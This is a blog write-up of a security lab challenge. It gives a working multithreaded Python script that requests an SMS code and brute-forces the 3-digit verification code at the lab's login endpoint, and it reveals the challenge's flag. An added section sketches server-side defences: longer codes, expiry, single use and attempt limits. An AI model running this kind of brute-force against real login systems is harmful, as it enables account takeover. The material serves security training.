Network Security Lab (Script Section: 基情燃烧的岁月, "Years of Burning Passion")


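Approach: brute-force the 3-digit, numeric-only verification code.
Pitfall: before brute-forcing, the script has to simulate clicking the link that requests a verification code. As in the real flow, the server must send a verification code first before you can start entering one; otherwise, how would the server know whether the code you entered is correct?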

# coding=utf-8
import threading

import requests

curtask = 100   # next candidate code to try
maxtask = 999   # last candidate code
flag = False    # set to True once a response no longer mentions 'vcode'
lock = threading.Lock()
url = "http://lab1.xseclab.com/vcode6_mobi_b46772933eb4c8b5175c67dbc44d8901"
s = requests.session()
r1 = s.get(url)
url3 = "http://lab1.xseclab.com/vcode6_mobi_b46772933eb4c8b5175c67dbc44d8901/vcode.php"
r = s.post(url=url3, data={
    'getcode': 1,
    'mobi': 13388886666
})  # simulate requesting the verification code
def threadrun():
    global curtask, lock, flag
    while not flag:
        # take the next candidate under the lock so no two threads try the same code
        lock.acquire()
        mytask = curtask
        curtask = curtask + 1
        lock.release()
        if mytask > maxtask:
            break
        url2 = "http://lab1.xseclab.com/vcode6_mobi_b46772933eb4c8b5175c67dbc44d8901/login.php"
        res = s.post(url=url2, data={
                'username': 13388886666,
                'vcode': mytask,
                'Login': 'submit'
            })
        res.encoding = res.apparent_encoding    # fix garbled Chinese text in the response
        print(str(mytask) + ": " + res.text)    # print the code that was tried, not the global loop variable
        if 'vcode' not in res.text:
            flag = True
threadingNum = 50
threadingList = []
for i in range(threadingNum):
    threadingList.append(threading.Thread(target=threadrun))
for i in threadingList:
    i.start()

After obtaining the ex's phone number, 13399999999, change the username in the script and continue brute-forcing.

The final flag is LKK8*(!@@sd
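
The script succeeds because the lab accepts unlimited guesses against a code with only 900 possible values. The following is an added example, not code from the original post or from the lab: a sketch of the server-side state that stops this enumeration, using a 6-digit code, an expiry, single use, and a failed-attempt budget enforced under a lock so concurrent requests cannot race past it. The class name, limits, and result strings are assumptions chosen for illustration.

```python
import hmac
import secrets
import threading
import time

MAX_ATTEMPTS = 5   # assumed policy: failed guesses allowed per issued code
CODE_TTL = 300     # assumed policy: code lifetime in seconds
CODE_DIGITS = 6    # 10**6 candidates instead of the lab's 900


class VcodeStore:
    """In-memory stand-in for the server-side verification-code state."""

    def __init__(self, now=time.monotonic):
        self._now = now
        self._lock = threading.Lock()   # the guessing script runs 50 threads
        self._pending = {}              # phone -> [code, expires_at, failures]

    def issue(self, phone):
        code = f"{secrets.randbelow(10 ** CODE_DIGITS):0{CODE_DIGITS}d}"
        with self._lock:
            self._pending[phone] = [code, self._now() + CODE_TTL, 0]
        return code  # a real service sends this by SMS, never in the response

    def verify(self, phone, guess):
        with self._lock:
            entry = self._pending.get(phone)
            if entry is None:
                return "no_code"             # nothing issued, or already burned
            if self._now() > entry[1]:
                del self._pending[phone]
                return "expired"
            if hmac.compare_digest(entry[0].encode(), str(guess).encode()):
                del self._pending[phone]     # single use
                return "ok"
            entry[2] += 1
            if entry[2] >= MAX_ATTEMPTS:
                del self._pending[phone]     # burn the code after too many misses
                return "locked"
            return "wrong"


def simulate_enumeration(store, phone, candidates):
    """Replay sequential guesses against the store and tally the results."""
    tally = {}
    for guess in candidates:
        result = store.verify(phone, guess)
        tally[result] = tally.get(result, 0) + 1
    return tally
```

Issuance needs its own rate limit per phone number and per client; otherwise requesting a fresh code simply resets the attempt budget.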


Title: Network Security Lab (Script Section: 基情燃烧的岁月, "Years of Burning Passion")
Author: abandon
URL: HTTPS://www.songsci.com/articles/2022/09/08/1662646937833.html
